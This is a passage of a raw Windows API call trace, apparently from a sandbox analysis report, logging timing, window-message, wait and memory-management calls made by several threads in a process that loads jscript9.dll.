Msg=0x401, wParam=0x37b89a4a, lParam=0x3d09) returned 1 [0180.797] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099961641349) returned 1 [0180.813] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099963200626) returned 1 [0180.813] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.813] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37b8d886, lParam=0x3d09) returned 1 [0180.813] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099963233906) returned 1 [0180.829] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099964800248) returned 1 [0180.829] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0180.829] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37b91702, lParam=0x3d09) returned 1 [0180.829] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099964835746) returned 1 [0180.845] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099966397627) returned 1 [0180.845] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099966414474) returned 1 [0180.861] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099968008336) returned 1 [0180.861] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099968028393) returned 1 [0180.877] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099969603992) returned 1 [0180.877] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099969618517) returned 1 [0180.893] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099971199427) returned 1 [0180.893] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099971213931) returned 1 [0180.909] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099972801132) returned 1 [0180.909] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099972816149) returned 1 [0180.925] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099974403688) returned 1 [0180.925] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099974421713) returned 1 [0180.941] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099976005297) returned 1 [0180.941] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099976022094) returned 1 [0180.957] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099977605227) returned 1 [0180.957] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099977622130) returned 1 [0180.973] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099979205316) returned 1 [0180.973] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099979224213) returned 1 [0181.002] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099982095986) returned 1 [0181.002] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099982113315) returned 1 [0181.005] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099982424427) returned 1 [0181.005] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099982455077) returned 1 [0181.021] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099984005859) returned 1 [0181.021] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099984023703) returned 1 [0181.037] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099985618439) returned 1 [0181.037] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099985643990) returned 1 [0181.053] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099987206781) returned 1 [0181.053] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099987231528) returned 1 [0181.083] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099990243406) returned 1 [0181.084] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099990262358) returned 1 [0181.099] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099991793717) returned 1 [0181.099] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099991812435) returned 1 [0181.115] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099993381866) returned 1 [0181.115] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099993401340) returned 1 [0181.131] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099994984029) returned 1 [0181.131] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099995004363) returned 1 [0181.147] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099996568435) returned 1 [0181.147] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0181.147] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37bdeff4, lParam=0x3d09) returned 1 [0181.148] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099996660810) returned 1 [0181.163] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099998162363) returned 1 [0181.163] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0181.163] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37be2e37, lParam=0x3d09) returned 1 [0181.163] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099998200346) returned 1 [0181.178] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099999738465) returned 1 [0181.178] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0181.179] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37be6bc8, lParam=0x3d09) returned 1 [0181.179] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099999783371) returned 1 [0181.194] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100001311911) returned 1 [0181.194] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0181.194] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37bea93f, lParam=0x3d09) returned 1 [0181.195] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100001370401) returned 1 [0181.210] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100002912522) returned 1 [0181.210] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0181.210] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37bee7c5, lParam=0x3d09) returned 1 [0181.211] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100002954561) returned 1 [0181.226] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100004511790) returned 1 [0181.226] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0181.226] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37bf263d, lParam=0x3d09) returned 1 [0181.226] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100004554317) returned 1 [0181.242] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100006109387) returned 1 [0181.242] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0181.242] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37bf64a5, lParam=0x3d09) returned 1 [0181.242] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100006154105) returned 1 [0181.258] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100007708284) returned 1 [0181.258] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0181.258] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37bfa31a, lParam=0x3d09) returned 1 [0181.258] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100007743878) returned 1 [0181.274] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100009306130) returned 1 [0181.274] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0181.274] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37bfe185, lParam=0x3d09) returned 1 [0181.274] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100009346152) returned 1 [0181.290] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100010899130) returned 1 [0181.290] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0181.290] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37c01fbf, lParam=0x3d09) returned 1 [0181.290] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100010937577) returned 1 [0181.306] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100012487412) returned 1 [0181.306] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0181.306] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37c05dca, lParam=0x3d09) returned 1 [0181.306] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100012525334) returned 1 [0181.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100014088722) returned 1 [0181.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100014105543) returned 1 [0181.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100015691765) returned 1 [0181.338] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100015708967) returned 1 [0181.354] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100017264342) returned 1 [0181.354] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0181.354] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0184.824] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100364318326) returned 1 [0184.839] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100365789628) returned 1 [0184.839] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0184.839] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37f646a8, lParam=0x3d09) returned 1 [0184.839] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100365829818) returned 1 [0184.855] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100367387802) returned 1 [0184.855] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0184.855] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37f68516, lParam=0x3d09) returned 1 [0184.855] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100367424890) returned 1 [0184.871] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100368991255) returned 1 [0184.871] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0184.871] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37f6c3b8, lParam=0x3d09) returned 1 [0184.871] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100369030781) returned 1 [0184.887] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100370588562) returned 1 [0184.887] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0184.887] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37f7021d, lParam=0x3d09) returned 1 [0184.887] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100370630790) returned 1 [0184.903] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100372192222) returned 1 [0184.903] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0184.903] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37f740c2, lParam=0x3d09) returned 1 [0184.903] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100372230480) returned 1 [0184.920] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100373883159) returned 1 [0184.920] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0184.920] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37f782cf, lParam=0x3d09) returned 1 [0184.921] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100373984916) returned 1 [0184.935] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100375433186) returned 1 [0184.935] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0184.935] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37f7bf5b, lParam=0x3d09) returned 1 [0184.936] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100375472449) returned 1 [0184.951] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3100377036588) returned 1 [0184.952] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0184.952] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0188.071] RtlTryEnterCriticalSection (CriticalSection=0x6cd09fe8) returned 1 [0188.071] GetCurrentThreadId () returned 0xf14 Thread: id = 38 os_tid = 0xeb8 [0132.130] GetCurrentThreadId () returned 0xeb8 Thread: id = 39 os_tid = 0xec0 [0132.283] GetCurrentThreadId () returned 0xec0 Thread: id = 40 os_tid = 0xdbc [0132.503] GetCurrentThreadId () returned 0xdbc Thread: id = 41 os_tid = 0xeec [0132.638] GetCurrentThreadId () returned 0xeec [0132.638] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="C:\\Windows\\SYSTEM32\\jscript9.dll", phModule=0x73fff00 | out: phModule=0x73fff00*=0x6c9c0000) returned 1 [0132.639] SetEvent (hEvent=0x38c) returned 1 [0132.645] GetCurrentThread () returned 0xfffffffe [0132.645] SetThreadPriority (hThread=0xfffffffe, nPriority=-1) returned 1 [0137.583] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x1 [0137.583] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x1 [0158.810] GetTickCount () returned 0x1d72609 [0158.810] GetTickCount () returned 0x1d72609 [0158.810] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0x3e8, bAlertable=0) returned 0x102 [0159.812] GetTickCount () returned 0x1d729f1 [0159.812] GetTickCount () returned 0x1d729f1 [0159.812] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0x2af, bAlertable=0) returned 0x102 [0160.500] GetTickCount () returned 0x1d72ca0 [0160.500] VirtualFree (lpAddress=0x9554000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.501] VirtualFree (lpAddress=0x9555000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.501] VirtualFree (lpAddress=0x9557000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.503] VirtualFree (lpAddress=0x9558000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.503] VirtualFree (lpAddress=0x9559000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.504] VirtualFree (lpAddress=0x955a000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.504] VirtualFree (lpAddress=0x955b000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.505] VirtualFree (lpAddress=0x955c000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.505] VirtualFree (lpAddress=0x955d000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.505] VirtualFree (lpAddress=0x955e000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.506] VirtualFree (lpAddress=0x955f000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.506] VirtualFree (lpAddress=0x9560000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.507] VirtualFree (lpAddress=0x9561000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.507] VirtualFree (lpAddress=0x9562000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.507] VirtualFree (lpAddress=0x9563000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.508] VirtualFree (lpAddress=0x9564000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.508] VirtualFree (lpAddress=0x9565000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.508] VirtualFree (lpAddress=0x9566000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.509] VirtualFree (lpAddress=0x9567000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.509] VirtualFree (lpAddress=0x9568000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.510] VirtualFree (lpAddress=0x9569000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.510] VirtualFree (lpAddress=0x956a000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.510] VirtualFree (lpAddress=0x956b000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.511] VirtualFree (lpAddress=0x956c000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.511] VirtualFree (lpAddress=0x956d000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.511] VirtualFree (lpAddress=0x956e000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.512] VirtualFree (lpAddress=0x956f000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.512] GetTickCount () returned 0x1d72cb0 [0160.512] RtlInterlockedPopEntrySList (in: ListHead=0xc00798 | out: ListHead=0xc00798) returned 0x0 [0160.512] RtlInterlockedPopEntrySList (in: ListHead=0xc00778 | out: ListHead=0xc00778) returned 0x0 [0160.512] VirtualFree (lpAddress=0x954b000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.513] VirtualFree (lpAddress=0x954c000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.513] VirtualFree (lpAddress=0x954d000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.514] VirtualFree (lpAddress=0x954e000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.514] VirtualFree (lpAddress=0x954f000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.514] VirtualFree (lpAddress=0x759c000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.515] VirtualFree (lpAddress=0x759d000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.515] VirtualFree (lpAddress=0x759e000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.516] VirtualFree (lpAddress=0x759f000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0160.516] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x1 [0161.319] GetTickCount () returned 0x1d72fdc [0161.319] GetTickCount () returned 0x1d72fdc [0161.319] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0x3e8, bAlertable=0) returned 0x102 [0162.319] GetTickCount () returned 0x1d733c4 [0162.319] GetTickCount () returned 0x1d733c4 [0162.319] RtlInterlockedPopEntrySList (in: ListHead=0xc00798 | out: ListHead=0xc00798) returned 0x0 [0162.320] RtlInterlockedPopEntrySList (in: ListHead=0xc00778 | out: ListHead=0xc00778) returned 0x0 [0162.320] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0x10a, bAlertable=0) returned 0x102 [0162.586] GetTickCount () returned 0x1d734ce [0162.586] VirtualFree (lpAddress=0x9554000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0162.587] VirtualFree (lpAddress=0x9555000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0162.588] VirtualFree (lpAddress=0x9557000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0162.588] VirtualFree (lpAddress=0x9558000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0162.589] VirtualFree (lpAddress=0x9559000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0162.589] VirtualFree (lpAddress=0x955a000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0162.589] VirtualFree (lpAddress=0x955b000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0162.590] VirtualFree (lpAddress=0x955c000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0162.590] VirtualFree (lpAddress=0x9560000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0162.591] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x1 [0164.238] GetTickCount () returned 0x1d73b36 [0164.238] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0x3e8, bAlertable=0) returned 0x102 [0165.238] GetTickCount () returned 0x1d73f2e [0165.239] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0x73ffef8*=0x390, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0186.810] malloc (_Size=0x30) returned 0xc5aa70 [0186.810] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0xa4b0000 [0186.812] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x759d000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9549000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9547000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9546000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9545000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9544000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9542000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9541000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9540000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9536000, dwRegionSize=0x1000, lpAddresses=0x73ffe20, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24 | out: lpAddresses=0x73ffe20*=0xc5aa70, lpdwCount=0x73ffe28, lpdwGranularity=0x73ffe24) returned 0x0 [0186.813] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x9535000, dwRegionSize=0x1000, 